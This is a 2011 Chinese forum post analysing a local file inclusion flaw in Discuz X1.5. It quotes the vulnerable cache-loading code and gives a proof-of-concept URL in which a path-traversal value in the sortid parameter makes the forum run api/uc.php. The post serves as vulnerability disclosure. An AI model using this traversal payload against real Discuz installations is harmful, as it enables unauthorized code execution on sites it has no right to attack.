琼殿技术论坛»首页 IT技术/使用交流 电脑病毒论坛 DISCUZ X1.5 本地文件包含漏洞
返回列表 发新帖
查看: 25|回复: 0

[漏洞分析] DISCUZ X1.5 本地文件包含漏洞

[复制链接]
开心健康幸福

3

主题

0

回帖

0

积分

热心网友

金币
0
阅读权限
220
精华
0
威望
0
贡献
0
在线时间
0 小时
注册时间
2010-7-6
发表于 2011-3-11 12:10:46 | 显示全部楼层 |阅读模式

  DISCUZX1.5 本地文件包含,当然是有条件的,就是使用文件作为缓存。

  config_global.php

  $_config['cache']['type'] = ‘file’;

  function cachedata($cachenames) {

  ……

  $isfilecache = getglobal(‘config/cache/type’) == ‘file’;

  ……

  if($isfilecache) {

  $lostcaches = array();

  foreach($cachenames as $cachename) {

  if(!@include_once(DISCUZ_ROOT.’./data/cache/cache_’.$cachename.’.php’)) {

  $lostcaches[] = $cachename;

  }

  }

  ……

  }

  地址:

  http://localhost:8080/bbs/forum.php?mod=post&action=threadsorts&sortid=ygjgj/../../../api/uc

  http://localhost:8080/bbs/forum.php?mod=post&action=threadsorts&sortid=ygjgj/../../../api/ucAuthracation has expiried

  执行了 api/uc.php 页面代码了。

  作者: Jannock
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver|手机版|小黑屋|琼殿技术论坛 |nimba_sitemap:appname

相关侵权、举报、投诉及建议等,请发 E-mail:qiongdian@foxmail.com

Powered by Discuz! X5.0 © 2001-2026 Discuz! Team.

在本版发帖返回顶部